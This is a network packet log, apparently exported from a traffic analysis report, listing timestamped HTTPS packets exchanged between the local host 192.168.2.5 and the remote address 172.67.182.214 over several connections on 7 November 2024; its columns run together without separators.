                                                                                                                                                                              Nov 7, 2024 18:04:20.311798096 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.311810970 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.311856985 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.341943979 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.342047930 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.342078924 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.342227936 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.342240095 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.342293024 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.342405081 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.386379957 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.386393070 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.428633928 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.428669930 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.428730965 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.428731918 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.428741932 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.428776979 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.458992958 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.459079027 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.459084988 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.493104935 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.493158102 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.493165970 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.493668079 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.493695974 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.493711948 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.493717909 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.493752956 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.546006918 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.576879978 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.576919079 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.576935053 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.576942921 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.576976061 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.576981068 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.577006102 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.577043056 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.610820055 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.611368895 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.611402988 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.611423016 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.611433029 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.612123013 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.669517994 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.694084883 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.694144964 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.694144011 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.694153070 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.694184065 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.694183111 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.729017973 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.729074001 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.729075909 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.729082108 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.729104996 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.729110956 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.729334116 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.780417919 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.780428886 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.780478001 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.811805010 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.811815023 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.811861992 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.811901093 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.846317053 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.846354961 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.846405029 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.846419096 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.846446991 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.846465111 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.897413969 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.897471905 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.929363012 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.929435015 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.929444075 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.929486990 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.963041067 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.963108063 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:20.963691950 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:20.963746071 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.014395952 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.014498949 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.065457106 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.065527916 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.080178976 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.080245018 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.080418110 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.080471992 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.131604910 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.131642103 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.131688118 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.131702900 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.131716013 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.135011911 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.182311058 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.182398081 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.197309017 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.197387934 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.197556973 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.197619915 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.248470068 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.248568058 CET44349705172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.248577118 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.248619080 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.251749992 CET49705443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.638919115 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.638967037 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:21.639051914 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.639281034 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:21.639297962 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.281234026 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.283993006 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:22.284022093 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.881784916 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.881834984 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.881871939 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.881886959 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:22.881910086 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.881953001 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:22.881957054 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.881969929 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.882019043 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:22.882026911 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.882133961 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.882163048 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.882174969 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:22.882184029 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.882232904 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:22.998606920 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.998783112 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.998811960 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.998846054 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:22.998863935 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:22.998919964 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:23.023608923 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:23.023745060 CET44349708172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:23.023806095 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:23.024199963 CET49708443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:27.685453892 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:27.685519934 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:27.685592890 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:27.685815096 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:27.685831070 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.295252085 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.306363106 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.306396008 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.670041084 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.670087099 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.670152903 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.670191050 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.670206070 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.670229912 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.670245886 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.670245886 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.670312881 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.670320034 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.670340061 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.670378923 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.670386076 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.714502096 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.714512110 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.757249117 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.757285118 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.757338047 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.757349014 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.757392883 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.787863016 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.787931919 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.788064003 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.788079023 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.788347960 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.788376093 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.788471937 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.788479090 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.788811922 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.788901091 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.839495897 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.872289896 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.905704975 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.905802011 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.905822039 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.905894995 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.905939102 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.905945063 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.905992031 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.906021118 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.906063080 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.906063080 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.906088114 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.906168938 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.946578026 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.946676970 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.946701050 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.988159895 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:28.988239050 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:28.988261938 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.020966053 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.021028042 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.021044016 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.021075964 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.021246910 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.021254063 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.021476030 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.021518946 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.021524906 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.063611031 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.063663006 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.063672066 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.105115891 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.138052940 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.138066053 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.138128996 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.138186932 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.138195992 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.138235092 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.138628006 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.180670023 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.180735111 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.180748940 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.180954933 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.222167015 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.222177029 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.222253084 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.255002022 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.255016088 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.255068064 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.256776094 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.256783009 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.256846905 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.297558069 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.297568083 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.297620058 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.339232922 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.339245081 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.339497089 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.372333050 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.372340918 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.372370005 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.372421980 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.372436047 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.372488022 CET44349717172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.372534037 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.372939110 CET49717443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.533224106 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.533277988 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:29.535044909 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.537484884 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:29.537499905 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.143038988 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.152640104 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.152658939 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.452395916 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.452450991 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.452488899 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.452521086 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.452522993 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.452543020 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.452574968 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.452601910 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.452634096 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.452665091 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.452672958 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.452708960 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.452893019 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.495745897 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.495768070 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.542613029 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.567903996 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.567976952 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.568028927 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.568074942 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.568085909 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.568175077 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.568218946 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.568298101 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.568331003 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.568337917 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.568345070 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.568384886 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.568397045 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.620735884 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.620748043 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.667603016 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.683432102 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.683532000 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.683604002 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.683643103 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.683655024 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.683665037 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.683676958 CET49721443192.168.2.5172.67.182.214
                                                                                                                                                                              Nov 7, 2024 18:04:30.684227943 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.684277058 CET44349721172.67.182.214192.168.2.5
                                                                                                                                                                              Nov 7, 2024 18:04:30.684338093 CET49721443192.168.2.5172.67.182.214
